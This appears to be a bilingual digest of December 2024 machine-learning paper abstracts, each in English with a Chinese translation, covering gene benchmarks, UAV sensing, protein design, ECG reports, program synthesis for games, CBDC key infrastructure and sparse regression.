标题: 你的模型是否理解基因?生物和文本模型基因属性的基准测试
摘要: 近年来,深度学习方法,尤其是基础模型在生物研究中的应用迅速增长。这些模型可以基于文本或训练在不同类型的生物数据,尤其是各种组学数据上。然而,由于训练数据和下游任务的差异,比较这些模型的性能一直是一个挑战。为了解决这个问题,我们开发了一种与架构无关的基准测试方法,而不是直接评估模型,利用每个模型的实体表示向量并为每个基准测试任务训练简单的预测模型。这确保了所有类型的模型都是使用相同的输入和输出类型进行评估。在这里,我们关注从专业策划的生物信息学数据库中收集的基因属性。这些基因属性分为五大类别:基因组属性、调控功能、定位、生物过程和蛋白质属性。总体而言,我们基于这些数据库定义了数百个任务,包括二进制、多标签和多类别分类任务。我们将这些基准任务应用于评估基于表达的模型、大型语言模型、蛋白质语言模型、基于DNA的模型和传统基准线。我们的研究结果表明,文本模型和蛋白质语言模型通常在基因组属性和调控功能任务中优于基于表达的模型,而基于表达的模型在定位任务中表现出更好的性能。这些结果应有助于开发更具信息的人工智能策略,用于生物理解和治疗发现。为了确保我们研究结果的可重复性和透明性,我们已经将源代码和基准数据公开在github.com/BiomedSciAI/gene-benchmark,供进一步调查和扩展。
更新时间: 2024-12-05 11:14:01
领域: cs.AI
Integrated Sensing and Communications for Low-Altitude Economy: A Deep Reinforcement Learning Approach
This paper studies an integrated sensing and communications (ISAC) system for low-altitude economy (LAE), where a ground base station (GBS) provides communication and navigation services for authorized unmanned aerial vehicles (UAVs), while sensing the low-altitude airspace to monitor the unauthorized mobile target. The expected communication sum-rate over a given flight period is maximized by jointly optimizing the beamforming at the GBS and UAVs' trajectories, subject to the constraints on the average signal-to-noise ratio requirement for sensing, the flight mission and collision avoidance of UAVs, as well as the maximum transmit power at the GBS. Typically, this is a sequential decision-making problem with the given flight mission. Thus, we transform it to a specific Markov decision process (MDP) model called episode task. Based on this modeling, we propose a novel LAE-oriented ISAC scheme, referred to as Deep LAE-ISAC (DeepLSC), by leveraging the deep reinforcement learning (DRL) technique. In DeepLSC, a reward function and a new action selection policy termed constrained noise-exploration policy are judiciously designed to fulfill various constraints. To enable efficient learning in episode tasks, we develop a hierarchical experience replay mechanism, where the gist is to employ all experiences generated within each episode to jointly train the neural network. Besides, to enhance the convergence speed of DeepLSC, a symmetric experience augmentation mechanism, which simultaneously permutes the indexes of all variables to enrich available experience sets, is proposed. Simulation results demonstrate that compared with benchmarks, DeepLSC yields a higher sum-rate while meeting the preset constraints, achieves faster convergence, and is more robust against different settings.
Updated: 2024-12-05 11:12:46
标题: 低空经济的综合感知和通信:一种深度强化学习方法
摘要: 这篇论文研究了一个用于低空经济(LAE)的综合感知和通信(ISAC)系统,其中地面基站(GBS)为授权的无人机提供通信和导航服务,同时感知低空领域以监测未经授权的移动目标。通过联合优化GBS和无人机轨迹的波束成形,最大化了给定飞行期间的通信总速率,同时受到对感知的平均信噪比要求、无人机的飞行任务和碰撞规避以及GBS的最大发送功率约束。通常,这是一个带有给定飞行任务的顺序决策问题。因此,我们将其转化为一个称为episode task的具体马尔可夫决策过程(MDP)模型。基于这种建模,我们提出了一种新颖的面向LAE的ISAC方案,称为Deep LAE-ISAC(DeepLSC),利用深度强化学习(DRL)技术。在DeepLSC中,精心设计了一个奖励函数和一种称为约束噪声探索策略的新的动作选择策略,以满足各种约束条件。为了在episode任务中实现高效学习,我们开发了一个分层经验回放机制,其要点是利用每个episode中生成的所有经验来共同训练神经网络。此外,为了增强DeepLSC的收敛速度,提出了一种对称经验增强机制,同时对所有变量的索引进行排列,以丰富可用的经验集。模拟结果表明,与基准相比,DeepLSC在满足预设约束条件的同时产生更高的总速率,实现更快的收敛速度,并且对不同设置更加稳健。
更新时间: 2024-12-05 11:12:46
领域: cs.NI,cs.LG
Boundary-Guided Learning for Gene Expression Prediction in Spatial Transcriptomics
Spatial transcriptomics (ST) has emerged as an advanced technology that provides spatial context to gene expression. Recently, deep learning-based methods have shown the capability to predict gene expression from WSI data using ST data. Existing approaches typically extract features from images and the neighboring regions using pretrained models, and then develop methods to fuse this information to generate the final output. However, these methods often fail to account for the cellular structure similarity, cellular density and the interactions within the microenvironment. In this paper, we propose a framework named BG-TRIPLEX, which leverages boundary information extracted from pathological images as guiding features to enhance gene expression prediction from WSIs. Specifically, our model consists of three branches: the spot, in-context and global branches. In the spot and in-context branches, boundary information, including edge and nuclei characteristics, is extracted using pretrained models. These boundary features guide the learning of cellular morphology and the characteristics of microenvironment through Multi-Head Cross-Attention. Finally, these features are integrated with global features to predict the final output. Extensive experiments were conducted on three public ST datasets. The results demonstrate that our BG-TRIPLEX consistently outperforms existing methods in terms of Pearson Correlation Coefficient (PCC). This method highlights the crucial role of boundary features in understanding the complex interactions between WSI and gene expression, offering a promising direction for future research.
Updated: 2024-12-05 11:09:11
标题: 空间转录组学中基因表达预测的边界引导学习
摘要: 空间转录组学(ST)已经成为一种先进技术,为基因表达提供了空间背景。最近,基于深度学习的方法已经显示出可以利用ST数据从WSI数据中预测基因表达的能力。现有方法通常从图像和相邻区域中提取特征,使用预训练模型,然后开发方法将这些信息融合以生成最终输出。然而,这些方法通常未能考虑细胞结构相似性、细胞密度和微环境中的相互作用。在本文中,我们提出了一个名为BG-TRIPLEX的框架,利用从病理图像中提取的边界信息作为引导特征,以增强从WSIs预测基因表达。具体来说,我们的模型包括三个分支:点、上下文和全局分支。在点和上下文分支中,使用预训练模型提取边界信息,包括边缘和细胞核特征。这些边界特征通过多头交叉注意力引导细胞形态学的学习以及微环境特征的学习。最终,这些特征与全局特征集成,预测最终输出。在三个公共ST数据集上进行了大量实验。结果表明,我们的BG-TRIPLEX在皮尔逊相关系数(PCC)方面一直优于现有方法。该方法突出了边界特征在理解WSI和基因表达之间复杂相互作用中的关键作用,为未来研究提供了一个有前途的方向。
更新时间: 2024-12-05 11:09:11
领域: cs.LG
ProtDAT: A Unified Framework for Protein Sequence Design from Any Protein Text Description
Protein design has become a critical method in advancing significant potential for various applications such as drug development and enzyme engineering. However, protein design methods utilizing large language models with solely pretraining and fine-tuning struggle to capture relationships in multi-modal protein data. To address this, we propose ProtDAT, a de novo fine-grained framework capable of designing proteins from any descriptive protein text input. ProtDAT builds upon the inherent characteristics of protein data to unify sequences and text as a cohesive whole rather than separate entities. It leverages an innovative multi-modal cross-attention, integrating protein sequences and textual information for a foundational level and seamless integration. Experimental results demonstrate that ProtDAT achieves the state-of-the-art performance in protein sequence generation, excelling in rationality, functionality, structural similarity, and validity. On 20,000 text-sequence pairs from Swiss-Prot, it improves pLDDT by 6%, TM-score by 0.26, and reduces RMSD by 1.2 {\AA}, highlighting its potential to advance protein design.
Updated: 2024-12-05 11:05:46
标题: ProtDAT:从任意蛋白质文本描述设计蛋白序列的统一框架
摘要: 蛋白质设计已经成为推动药物开发和酶工程等各种应用潜力的关键方法。然而,利用大型语言模型进行蛋白质设计的方法仅通过预训练和微调很难捕捉多模态蛋白质数据中的关系。为了解决这个问题,我们提出了ProtDAT,这是一个全新的细粒度框架,能够从任何描述性蛋白质文本输入中设计蛋白质。ProtDAT建立在蛋白质数据的固有特性之上,将序列和文本统一为一个整体,而不是分开的实体。它利用创新的多模态交叉注意力,将蛋白质序列和文本信息集成在基础级别,并实现无缝集成。实验结果表明,ProtDAT在蛋白质序列生成方面达到了最先进的性能,在合理性、功能性、结构相似性和有效性方面表现出色。在来自Swiss-Prot的20,000个文本-序列对中,它将pLDDT提高了6%,TM-score提高了0.26,并将RMSD降低了1.2Å,突显了其推动蛋白质设计的潜力。
更新时间: 2024-12-05 11:05:46
领域: cs.AI
Automated Medical Report Generation for ECG Data: Bridging Medical Text and Signal Processing with Deep Learning
Recent advances in deep learning and natural language generation have significantly improved image captioning, enabling automated, human-like descriptions for visual content. In this work, we apply these captioning techniques to generate clinician-like interpretations of ECG data. This study leverages existing ECG datasets accompanied by free-text reports authored by healthcare professionals (HCPs) as training data. These reports, while often inconsistent, provide a valuable foundation for automated learning. We introduce an encoder-decoder-based method that uses these reports to train models to generate detailed descriptions of ECG episodes. This represents a significant advancement in ECG analysis automation, with potential applications in zero-shot classification and automated clinical decision support. The model is tested on various datasets, including both 1- and 12-lead ECGs. It significantly outperforms the state-of-the-art reference model by Qiu et al., achieving a METEOR score of 55.53% compared to 24.51% achieved by the reference model. Furthermore, several key design choices are discussed, providing a comprehensive overview of current challenges and innovations in this domain. The source codes for this research are publicly available in our Git repository https://git.zib.de/ableich/ecg-comment-generation-public
Updated: 2024-12-05 11:05:12
标题: ECG数据的自动生成医疗报告:利用深度学习桥接医学文本和信号处理
摘要: 深度学习和自然语言生成的最新进展显著改进了图像字幕,实现了对视觉内容的自动化、类人描述。在这项工作中,我们应用这些字幕技术来生成临床医生般的心电图数据解读。本研究利用现有的心电图数据集以及由医疗专业人士(HCPs)撰写的自由文本报告作为训练数据。尽管这些报告经常不一致,但它们为自动化学习提供了宝贵的基础。我们引入了一种基于编码器-解码器的方法,利用这些报告来训练模型生成心电图片段的详细描述。这代表了心电图分析自动化的重大进步,具有在零-shot分类和自动化临床决策支持方面的潜在应用。 该模型在各种数据集上进行了测试,包括1导联和12导联心电图。它显著优于邱等人提出的最新参考模型,实现了55.53%的METEOR分数,而参考模型只有24.51%。此外,讨论了几个关键设计选择,提供了该领域当前挑战和创新的全面概述。 本研究的源代码在我们的Git仓库https://git.zib.de/ableich/ecg-comment-generation-public中公开可用。
更新时间: 2024-12-05 11:05:12
领域: cs.CL,cs.AI
FPANet: Frequency-based Video Demoireing using Frame-level Post Alignment
Moire patterns, created by the interference between overlapping grid patterns in the pixel space, degrade the visual quality of images and videos. Therefore, removing such patterns~(demoireing) is crucial, yet remains a challenge due to their complexities in sizes and distortions. Conventional methods mainly tackle this task by only exploiting the spatial domain of the input images, limiting their capabilities in removing large-scale moire patterns. Therefore, this work proposes FPANet, an image-video demoireing network that learns filters in both frequency and spatial domains, improving the restoration quality by removing various sizes of moire patterns. To further enhance, our model takes multiple consecutive frames, learning to extract frame-invariant content features and outputting better quality temporally consistent images. We demonstrate the effectiveness of our proposed method with a publicly available large-scale dataset, observing that ours outperforms the state-of-the-art approaches in terms of image and video quality metrics and visual experience.
Updated: 2024-12-05 11:03:41
标题: FPANet:使用帧级后对齐的频率视频去莫尔滤波
摘要: Moire纹样是由像素空间中重叠的网格图案之间的干涉所创建的,会降低图像和视频的视觉质量。因此,去除这种纹样(去moireing)是至关重要的,但由于它们在尺寸和扭曲方面的复杂性,仍然是一个挑战。传统方法主要通过利用输入图像的空间域来处理这个任务,限制了它们去除大尺度moire纹样的能力。因此,本文提出了FPANet,一个图像视频去moire网络,它在频率和空间域中学习滤波器,通过去除各种尺寸的moire纹样来提高恢复质量。为了进一步增强,我们的模型采用多个连续帧,学习提取帧不变内容特征,并输出更高质量的时间一致图像。我们通过一个公开可用的大规模数据集展示了我们提出的方法的有效性,观察到我们的方法在图像和视频质量指标以及视觉体验方面优于最先进的方法。
更新时间: 2024-12-05 11:03:41
领域: cs.CV,cs.AI
Online SLA Decomposition: Enabling Real-Time Adaptation to Evolving Systems
When a network slice spans multiple technology domains, it is crucial for each domain to uphold the End-to-End (E2E) Service Level Agreement (SLA) associated with the slice. Consequently, the E2E SLA must be properly decomposed into partial SLAs that are assigned to each domain involved. In a network slice management system with a two-level architecture, comprising an E2E service orchestrator and local domain controllers, we consider that the orchestrator has access solely to historical data regarding the responses of local controllers to previous requests, and this information is used to construct a risk model for each domain. In this study, we extend our previous work by investigating the dynamic nature of real-world systems and introducing an online learning-decomposition framework to tackle the dynamicity. We propose a framework that periodically updates the risk models based on the most recent feedback. This approach leverages key components such as online gradient descent and FIFO memory buffers, which enhance the stability and robustness of the overall process. Our empirical study on an analytic model-based simulator demonstrates that the proposed framework outperforms the state-of-the-art static approach, providing more accurate and resilient SLA decomposition even under varying conditions and limited data scenarios.
Updated: 2024-12-05 11:01:30
标题: 在线SLA分解:实时适应不断发展的系统
摘要: 当一个网络切片跨越多个技术领域时,每个领域都必须遵守与该切片相关联的端到端(E2E)服务级别协议(SLA)是至关重要的。因此,E2E SLA必须被适当地分解为分配给每个涉及的领域的部分SLA。在一个具有两级架构的网络切片管理系统中,包括一个E2E服务编排器和本地域控制器,我们认为编排器仅能访问有关本地控制器对先前请求的响应的历史数据,并且这些信息被用来为每个领域构建风险模型。在这项研究中,我们通过调查真实世界系统的动态性质和引入一个在线学习分解框架来扩展我们之前的工作。我们提出了一个框架,根据最新的反馈定期更新风险模型。这种方法利用了在线梯度下降和FIFO内存缓冲区等关键组件,增强了整个过程的稳定性和韧性。我们在基于分析模型的模拟器上进行的实证研究表明,所提出的框架胜过了最先进的静态方法,在不同条件和有限数据场景下提供了更准确和有韧性的SLA分解。
更新时间: 2024-12-05 11:01:30
领域: cs.NI,cs.AI,cs.LG
Space to Policy: Scalable Brick Kiln Detection and Automatic Compliance Monitoring with Geospatial Data
Air pollution kills 7 million people annually. The brick kiln sector significantly contributes to economic development but also accounts for 8-14\% of air pollution in India. Policymakers have implemented compliance measures to regulate brick kilns. Emission inventories are critical for air quality modeling and source apportionment studies. However, the largely unorganized nature of the brick kiln sector necessitates labor-intensive survey efforts for monitoring. Recent efforts by air quality researchers have relied on manual annotation of brick kilns using satellite imagery to build emission inventories, but this approach lacks scalability. Machine-learning-based object detection methods have shown promise for detecting brick kilns; however, previous studies often rely on costly high-resolution imagery and fail to integrate with governmental policies. In this work, we developed a scalable machine-learning pipeline that detected and classified 30638 brick kilns across five states in the Indo-Gangetic Plain using free, moderate-resolution satellite imagery from Planet Labs. Our detections have a high correlation with on-ground surveys. We performed automated compliance analysis based on government policies. In the Delhi airshed, stricter policy enforcement has led to the adoption of efficient brick kiln technologies. This study highlights the need for inclusive policies that balance environmental sustainability with the livelihoods of workers.
Updated: 2024-12-05 10:59:54
标题: 空间到政策:利用地理空间数据实现可扩展的砖窑检测和自动合规监测
摘要: 空气污染每年夺走700万人的生命。砖窑行业在很大程度上促进了经济发展,但也占据了印度8-14\%的空气污染量。决策者已经实施了符合性措施来监管砖窑。排放清单对于空气质量建模和源解析研究至关重要。然而,砖窑行业的大部分未组织性质需要大量的调查工作来进行监测。空气质量研究人员最近的努力依赖于利用卫星图像手动注释砖窑以建立排放清单,但这种方法缺乏可扩展性。基于机器学习的目标检测方法已经显示出在检测砖窑方面的潜力;然而,先前的研究通常依赖于昂贵的高分辨率图像,且无法与政府政策整合。在这项工作中,我们开发了一个可扩展的机器学习流水线,利用来自Planet Labs的免费、中等分辨率卫星图像,在印度恒沙平原的五个邦中检测和分类了30638个砖窑。我们的检测结果与地面调查高度相关。我们基于政府政策进行了自动符合性分析。在德里空气流域,更严格的政策执行已经促使采用了高效的砖窑技术。这项研究强调了需要平衡环境可持续性和工人生计的包容性政策。
更新时间: 2024-12-05 10:59:54
领域: cs.LG
Graph Neural Networks Need Cluster-Normalize-Activate Modules
Graph Neural Networks (GNNs) are non-Euclidean deep learning models for graph-structured data. Despite their successful and diverse applications, oversmoothing prohibits deep architectures due to node features converging to a single fixed point. This severely limits their potential to solve complex tasks. To counteract this tendency, we propose a plug-and-play module consisting of three steps: Cluster-Normalize-Activate (CNA). By applying CNA modules, GNNs search and form super nodes in each layer, which are normalized and activated individually. We demonstrate in node classification and property prediction tasks that CNA significantly improves the accuracy over the state-of-the-art. Particularly, CNA reaches 94.18% and 95.75% accuracy on Cora and CiteSeer, respectively. It further benefits GNNs in regression tasks as well, reducing the mean squared error compared to all baselines. At the same time, GNNs with CNA require substantially fewer learnable parameters than competing architectures.
Updated: 2024-12-05 10:59:20
标题: 图神经网络需要集群-归一化-激活模块
摘要: 图神经网络(GNNs)是针对图结构数据的非欧几里德深度学习模型。尽管它们在成功和多样的应用中表现出色,但过度平滑会导致节点特征收敛到一个固定点,阻碍了深层结构的建立。这严重限制了它们解决复杂任务的潜力。为了对抗这种趋势,我们提出了一个插入式模块,包括三个步骤:聚类-归一化-激活(CNA)。通过应用CNA模块,GNNs在每一层中搜索并形成超级节点,这些节点被单独归一化和激活。我们在节点分类和属性预测任务中展示了CNA显著提高了准确性,超过了最先进技术。特别是,CNA在Cora和CiteSeer上分别达到了94.18%和95.75%的准确率。它还在回归任务中有益于GNNs,降低了与所有基线相比的均方误差。同时,具有CNA的GNNs所需的可学习参数明显少于竞争架构。
更新时间: 2024-12-05 10:59:20
领域: cs.LG,cs.AI,68T07,I.2.0
Deep learning empowered sensor fusion boosts infant movement classification
To assess the integrity of the developing nervous system, the Prechtl general movement assessment (GMA) is recognized for its clinical value in diagnosing neurological impairments in early infancy. GMA has been increasingly augmented through machine learning approaches intending to scale-up its application, circumvent costs in the training of human assessors and further standardize classification of spontaneous motor patterns. Available deep learning tools, all of which are based on single sensor modalities, are however still considerably inferior to that of well-trained human assessors. These approaches are hardly comparable as all models are designed, trained and evaluated on proprietary/silo-data sets. With this study we propose a sensor fusion approach for assessing fidgety movements (FMs). FMs were recorded from 51 typically developing participants. We compared three different sensor modalities (pressure, inertial, and visual sensors). Various combinations and two sensor fusion approaches (late and early fusion) for infant movement classification were tested to evaluate whether a multi-sensor system outperforms single modality assessments. Convolutional neural network (CNN) architectures were used to classify movement patterns. The performance of the three-sensor fusion (classification accuracy of 94.5%) was significantly higher than that of any single modality evaluated. We show that the sensor fusion approach is a promising avenue for automated classification of infant motor patterns. The development of a robust sensor fusion system may significantly enhance AI-based early recognition of neurofunctions, ultimately facilitating automated early detection of neurodevelopmental conditions.
Updated: 2024-12-05 10:57:12
标题: 深度学习增强的传感器融合提升婴儿运动分类
摘要: 为评估发育中的神经系统完整性,Prechtl普通运动评估(GMA)被认为在早期婴儿诊断神经功能障碍方面具有临床价值。通过机器学习方法增强GMA的应用已逐渐增加,旨在扩大其应用范围,避免培训人类评估员的成本,并进一步标准化自发运动模式的分类。然而,目前所有基于单一传感器模态的可用深度学习工具仍远远不及训练有素的人类评估员。这些方法几乎无法比较,因为所有模型均设计、训练和评估于专有/孤立数据集上。通过本研究,我们提出了一种用于评估烦躁运动(FMs)的传感器融合方法。FMs来自51名典型发育参与者。我们比较了三种不同的传感器模态(压力、惯性和视觉传感器)。测试了各种组合和两种传感器融合方法(后期融合和前期融合)以评估多传感器系统是否优于单模态评估。使用卷积神经网络(CNN)架构对运动模式进行分类。三传感器融合的性能(分类准确率为94.5%)明显高于任何评估的单一模态。我们表明,传感器融合方法是自动分类婴儿运动模式的一个有希望的途径。开发一个稳健的传感器融合系统可能会显著增强基于AI的早期神经功能识别,最终促进神经发育状况的自动早期检测。
更新时间: 2024-12-05 10:57:12
领域: cs.LG,cs.AI
ZipAR: Accelerating Autoregressive Image Generation through Spatial Locality
In this paper, we propose ZipAR, a training-free, plug-and-play parallel decoding framework for accelerating auto-regressive (AR) visual generation. The motivation stems from the observation that images exhibit local structures, and spatially distant regions tend to have minimal interdependence. Given a partially decoded set of visual tokens, in addition to the original next-token prediction scheme in the row dimension, the tokens corresponding to spatially adjacent regions in the column dimension can be decoded in parallel, enabling the ``next-set prediction'' paradigm. By decoding multiple tokens simultaneously in a single forward pass, the number of forward passes required to generate an image is significantly reduced, resulting in a substantial improvement in generation efficiency. Experiments demonstrate that ZipAR can reduce the number of model forward passes by up to 91% on the Emu3-Gen model without requiring any additional retraining.
Updated: 2024-12-05 10:57:08
标题: ZipAR:通过空间局部性加速自回归图像生成
摘要: 在这篇论文中,我们提出了ZipAR,一个无需训练、即插即用的并行解码框架,用于加速自回归(AR)视觉生成。动机源于观察到图像具有局部结构,空间上远离的区域往往具有最小的相互依赖性。给定一个部分解码的视觉标记集,除了在行维度上的原始下一个标记预测方案外,在列维度上与空间相邻区域对应的标记可以并行解码,实现“下一个集合预测”范式。通过在单次前向传递中同时解码多个标记,生成图像所需的前向传递次数显著减少,从而大幅提高生成效率。实验证明,ZipAR可以将Emu3-Gen模型上模型前向传递次数减少高达91%,而无需任何额外的重新训练。
更新时间: 2024-12-05 10:57:08
领域: cs.CV,cs.AI
Expanding Deep Learning-based Sensing Systems with Multi-Source Knowledge Transfer
Expanding the existing sensing systems to provide high-quality deep learning models for more domains, such as new users or environments, is challenged by the limited labeled data and the data and device heterogeneities. While knowledge distillation methods could overcome label scarcity and device heterogeneity, they assume the teachers are fully reliable and overlook the data heterogeneity, which prevents the direct adoption of existing models. To address this problem, this paper proposes an efficient knowledge transfer framework, HaKT, to expand sensing systems. It first selects multiple high-quality models from the system at a low cost and then fuses their knowledge by assigning sample-wise weights to their predictions. Later, the fused knowledge is selectively injected into the customized models for new domains based on the knowledge quality. Extensive experiments on different tasks, modalities, and settings show that HaKT outperforms stat-of-the-art baselines by at most 16.5% accuracy and saves up to 39% communication traffic.
Updated: 2024-12-05 10:55:54
标题: 利用多源知识传输扩展基于深度学习的传感系统
摘要: 将现有的传感系统扩展以为更多领域提供高质量的深度学习模型,如新用户或环境,面临着有限的标记数据和数据和设备异质性的挑战。虽然知识蒸馏方法可以克服标签稀缺和设备异质性,但它们假设教师完全可靠,并忽视数据异质性,这阻碍了对现有模型的直接采用。为解决这一问题,本文提出了一个高效的知识传递框架HaKT,以扩展传感系统。首先以较低成本从系统中选择多个高质量模型,然后通过为其预测分配样本权重来融合它们的知识。随后,根据知识质量,选择性地将融合的知识注入定制模型,以适用于新领域。对不同任务、模态和设置的大量实验证明,HaKT的准确率最高比最先进的基线高出16.5%,并且节省了高达39%的通信流量。
更新时间: 2024-12-05 10:55:54
领域: cs.AI
From Code to Play: Benchmarking Program Search for Games Using Large Language Models
Large language models (LLMs) have shown impressive capabilities in generating program code, opening exciting opportunities for applying program synthesis to games. In this work, we explore the potential of LLMs to directly synthesize usable code for a wide range of gaming applications, focusing on two programming languages, Python and Java. We use an evolutionary hill-climbing algorithm, where the mutations and seeds of the initial programs are controlled by LLMs. For Python, the framework covers various game-related tasks, including five miniature versions of Atari games, ten levels of Baba is You, an environment inspired by Asteroids, and a maze generation task. For Java, the framework contains 12 games from the TAG tabletop games framework. Across 29 tasks, we evaluated 12 language models for Python and 8 for Java. Our findings suggest that the performance of LLMs depends more on the task than on model size. While larger models generate more executable programs, these do not always result in higher-quality solutions but are much more expensive. No model has a clear advantage, although on any specific task, one model may be better. Trying many models on a problem and using the best results across them is more reliable than using just one.
Updated: 2024-12-05 10:50:58
标题: 从代码到游戏:使用大型语言模型对游戏进行程序搜索的基准测试
摘要: 大型语言模型(LLMs)已经展示出在生成程序代码方面的惊人能力,为将程序综合应用于游戏开辟了令人兴奋的机遇。在这项工作中,我们探讨LLMs直接合成广泛游戏应用程序代码的潜力,重点关注两种编程语言,Python和Java。我们使用进化式爬山算法,其中初始程序的变异和种子由LLMs控制。对于Python,该框架涵盖了各种与游戏相关的任务,包括五个微型版的Atari游戏,十个Baba is You的关卡,受Asteroids启发的环境以及迷宫生成任务。对于Java,该框架包含了TAG桌面游戏框架中的12个游戏。在29个任务中,我们评估了12个Python语言模型和8个Java语言模型。我们的研究结果表明,LLMs的性能更多地取决于任务而不是模型大小。虽然更大的模型可以生成更多可执行程序,但这并不总是导致更高质量的解决方案,而且成本更高。没有模型有明显优势,尽管在任何特定任务上,一个模型可能更好。尝试在问题上使用许多模型,并使用它们之间的最佳结果更可靠,而不是仅使用一个模型。
更新时间: 2024-12-05 10:50:58
领域: cs.AI
AdamMCMC: Combining Metropolis Adjusted Langevin with Momentum-based Optimization
Uncertainty estimation is a key issue when considering the application of deep neural network methods in science and engineering. In this work, we introduce a novel algorithm that quantifies epistemic uncertainty via Monte Carlo sampling from a tempered posterior distribution. It combines the well established Metropolis Adjusted Langevin Algorithm (MALA) with momentum-based optimization using Adam and leverages a prolate proposal distribution, to efficiently draw from the posterior. We prove that the constructed chain admits the Gibbs posterior as invariant distribution and approximates this posterior in total variation distance. Furthermore, we demonstrate the efficiency of the resulting algorithm and the merit of the proposed changes on a state-of-the-art classifier from high-energy particle physics.
Updated: 2024-12-05 10:49:37
标题: AdamMCMC:将Metropolis调整的Langevin与基于动量的优化相结合
摘要: 不确定性估计是考虑在科学和工程中应用深度神经网络方法时的关键问题。在这项工作中,我们介绍了一种通过从温和后验分布中蒙特卡洛采样来量化认知不确定性的新算法。它将已建立的Metropolis调整Langevin算法(MALA)与基于动量的优化结合使用Adam,并利用椭球形提议分布,以有效地从后验中抽样。我们证明构建的链具有Gibbs后验作为不变分布,并在总变化距离上逼近这个后验。此外,我们展示了所得算法的效率以及对来自高能粒子物理学的最先进分类器提出的变化的优点。
更新时间: 2024-12-05 10:49:37
领域: stat.ML,cs.LG,hep-ph,stat.CO
How to design a Public Key Infrastructure for a Central Bank Digital Currency
Central Bank Digital Currency (CBDC) is a new form of money, issued by a country's or region's central bank, that can be used for a variety of payment scenarios. Depending on its concrete implementation, there are many participants in a production CBDC ecosystem, including the central bank, commercial banks, merchants, individuals, and wallet providers. There is a need for robust and scalable Public Key Infrastructure (PKI) for CBDC to ensure the continued trust of all entities in the system. This paper discusses the criteria that should flow into the design of a PKI and proposes a certificate hierarchy, together with a rollover concept ensuring continuous operation of the system. We further consider several peculiarities, such as the circulation of offline-capable hardware wallets.
Updated: 2024-12-05 10:41:38
标题: 如何为央行数字货币设计一个公钥基础设施
摘要: 央行数字货币(CBDC)是央行发行的一种新形式的货币,可用于各种支付场景。根据具体实施情况,在生产CBDC生态系统中有许多参与者,包括央行、商业银行、商家、个人和钱包提供商。为了确保系统中所有实体的持续信任,CBDC需要健壮且可扩展的公钥基础设施(PKI)。本文讨论了应该流入PKI设计的标准,并提出了证书层次结构,以及一个保证系统持续运行的换证概念。我们进一步考虑了几个特殊情况,例如离线能力硬件钱包的流通。
更新时间: 2024-12-05 10:41:38
领域: cs.CR,cs.NI,C.2.0; K.4.4; K.6.5
Iterative Reweighted Framework Based Algorithms for Sparse Linear Regression with Generalized Elastic Net Penalty
The elastic net penalty is frequently employed in high-dimensional statistics for parameter regression and variable selection. It is particularly beneficial compared to lasso when the number of predictors greatly surpasses the number of observations. However, empirical evidence has shown that the $\ell_q$-norm penalty (where $0 < q < 1$) often provides better regression compared to the $\ell_1$-norm penalty, demonstrating enhanced robustness in various scenarios. In this paper, we explore a generalized elastic net model that employs a $\ell_r$-norm (where $r \geq 1$) in loss function to accommodate various types of noise, and employs a $\ell_q$-norm (where $0 < q < 1$) to replace the $\ell_1$-norm in elastic net penalty. Theoretically, we establish the computable lower bounds for the nonzero entries of the generalized first-order stationary points of the proposed generalized elastic net model. For implementation, we develop two efficient algorithms based on the locally Lipschitz continuous $\epsilon$-approximation to $\ell_q$-norm. The first algorithm employs an alternating direction method of multipliers (ADMM), while the second utilizes a proximal majorization-minimization method (PMM), where the subproblems are addressed using the semismooth Newton method (SNN). We also perform extensive numerical experiments with both simulated and real data, showing that both algorithms demonstrate superior performance. Notably, the PMM-SSN is efficient than ADMM, even though the latter provides a simpler implementation.
Updated: 2024-12-05 10:40:41
标题: 基于迭代重新加权框架的广义弹性网络惩罚稀疏线性回归算法
摘要: The elastic net penalty is often used in high-dimensional statistics for parameter regression and variable selection. It is particularly advantageous when there are more predictors than observations. However, research has shown that the $\ell_q$-norm penalty (where $0 < q < 1$) often leads to better regression results compared to the $\ell_1$-norm penalty, indicating improved robustness in various scenarios. This paper introduces a generalized elastic net model that incorporates a $\ell_r$-norm (where $r \geq 1$) in the loss function to handle different types of noise, and uses a $\ell_q$-norm (where $0 < q < 1$) instead of the $\ell_1$-norm in the elastic net penalty. Theoretical analysis establishes lower bounds for the non-zero entries of the generalized first-order stationary points of this model. Two efficient algorithms based on locally Lipschitz continuous $\epsilon$-approximations to the $\ell_q$-norm are developed for implementation. The first algorithm uses an alternating direction method of multipliers (ADMM), while the second employs a proximal majorization-minimization method (PMM) with subproblems solved using the semismooth Newton method (SNN). Extensive numerical experiments with simulated and real data demonstrate the superior performance of both algorithms, with PMM-SSN showing greater efficiency compared to ADMM despite the latter's simpler implementation.
更新时间: 2024-12-05 10:40:41
领域: stat.ML,cs.LG,math.ST,stat.TH
Pathwise optimization for bridge-type estimators and its applications
Sparse parametric models are of great interest in statistical learning and are often analyzed by means of regularized estimators. Pathwise methods allow to efficiently compute the full solution path for penalized estimators, for any possible value of the penalization parameter $\lambda$. In this paper we deal with the pathwise optimization for bridge-type problems; i.e. we are interested in the minimization of a loss function, such as negative log-likelihood or residual sum of squares, plus the sum of $\ell^q$ norms with $q\in(0,1]$ involving adpative coefficients. For some loss functions this regularization achieves asymptotically the oracle properties (such as the selection consistency). Nevertheless, since the objective function involves nonconvex and nondifferentiable terms, the minimization problem is computationally challenging. The aim of this paper is to apply some general algorithms, arising from nonconvex optimization theory, to compute efficiently the path solutions for the adaptive bridge estimator with multiple penalties. In particular, we take into account two different approaches: accelerated proximal gradient descent and blockwise alternating optimization. The convergence and the path consistency of these algorithms are discussed. In order to assess our methods, we apply these algorithms to the penalized estimation of diffusion processes observed at discrete times. This latter represents a recent research topic in the field of statistics for time-dependent data.
Updated: 2024-12-05 10:38:29
标题: 桥式估计器的路径优化及其应用
摘要: 稀疏参数模型在统计学习中备受关注,通常通过正则化估计器进行分析。路径法可以有效地计算受惩罚估计器的完整解路径,对于任意可能的惩罚参数$\lambda$。本文讨论桥式问题的路径优化;即我们对于损失函数的最小化感兴趣,例如负对数似然或残差平方和,再加上涉及自适应系数的$\ell^q$范数之和,其中$q\in(0,1]$。对于某些损失函数,这种正则化在渐进上实现了oracle性质(如选择一致性)。然而,由于目标函数涉及非凸和不可微的项,最小化问题具有计算上的挑战。 本文旨在应用非凸优化理论中产生的一些通用算法,有效地计算具有多个惩罚的自适应桥估计器的解路径。特别是,我们考虑了两种不同的方法:加速近端梯度下降和分块交替优化。讨论了这些算法的收敛性和路径一致性。为了评估我们的方法,我们将这些算法应用于在离散时间观测到的扩散过程的惩罚估计。这后者代表了统计学领域关于时变数据的最新研究课题。
